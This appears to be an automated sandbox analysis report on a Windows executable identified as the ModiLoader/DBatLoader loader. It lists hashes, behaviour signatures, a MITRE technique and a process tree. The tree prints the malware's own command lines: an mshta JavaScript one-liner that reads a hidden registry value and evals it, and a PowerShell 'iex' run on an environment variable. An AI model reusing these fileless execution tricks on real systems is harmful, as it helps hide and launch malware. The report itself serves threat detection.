Analysis

  • max time kernel
    107s
  • max time network
    45s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    03-10-2022 21:11

General

  • Target

    8c4a22f48726a955f88f52a56ce34a5e3ea82e36d641cc7cc1c0dd097845cb5e.exe

  • Size

    299KB

  • MD5

    3afec8ce8d988162c77f47f769f657b8

  • SHA1

    5bef1b2ce5ef119884381f7bcff7860b60dcc048

  • SHA256

    8c4a22f48726a955f88f52a56ce34a5e3ea82e36d641cc7cc1c0dd097845cb5e

  • SHA512

    b6af0eed4ec7b17edf2ec0b79bcc89a0e923a3ef88b7ccab63ed661cd9f8fa2774d385dbc84c858295e2733306848662e60b79356223d8d98d1c11aae9bb9e0c

  • SSDEEP

    6144:AuCeBGw82i4MaCqCGlGfr/9t7HVJrmxF3eTd6fWqiog1Mp1JJ52Q5kd:OeBGv2i4MtBGlGbP7HViYTuioec2oY

Score
10/10

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ModiLoader Second Stage 3 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8c4a22f48726a955f88f52a56ce34a5e3ea82e36d641cc7cc1c0dd097845cb5e.exe
    "C:\Users\Admin\AppData\Local\Temp\8c4a22f48726a955f88f52a56ce34a5e3ea82e36d641cc7cc1c0dd097845cb5e.exe"
    1⤵
      PID:1468
    • C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" javascript:pXBUw7I="hJdw";os55=new%20ActiveXObject("WScript.Shell");JZdJ3mdLt="HP6Z";Hc7a0K=os55.RegRead("HKLM\\software\\Wow6432Node\\WZuPwAmF\\zlDYvpM5YS");pN2ibg5gCS="retGG";eval(Hc7a0K);TvMFL5A="I3Z82";
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:908
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:mghyfq
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:520
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
          dw20.exe -x -s 820
          3⤵
            PID:1780

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Discovery

      System Information Discovery

      1
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/520-59-0x0000000000000000-mapping.dmp
      • memory/520-61-0x0000000073470000-0x0000000073A1B000-memory.dmp
        Filesize

        5.7MB

      • memory/520-63-0x0000000073470000-0x0000000073A1B000-memory.dmp
        Filesize

        5.7MB

      • memory/908-57-0x000007FEFBCB1000-0x000007FEFBCB3000-memory.dmp
        Filesize

        8KB

      • memory/1468-54-0x0000000075211000-0x0000000075213000-memory.dmp
        Filesize

        8KB

      • memory/1468-55-0x0000000001FA0000-0x0000000001FE0000-memory.dmp
        Filesize

        256KB

      • memory/1468-56-0x0000000000400000-0x000000000044F000-memory.dmp
        Filesize

        316KB

      • memory/1468-58-0x0000000000050000-0x0000000000110000-memory.dmp
        Filesize

        768KB

      • memory/1468-62-0x0000000000050000-0x0000000000110000-memory.dmp
        Filesize

        768KB

      • memory/1780-64-0x0000000000000000-mapping.dmp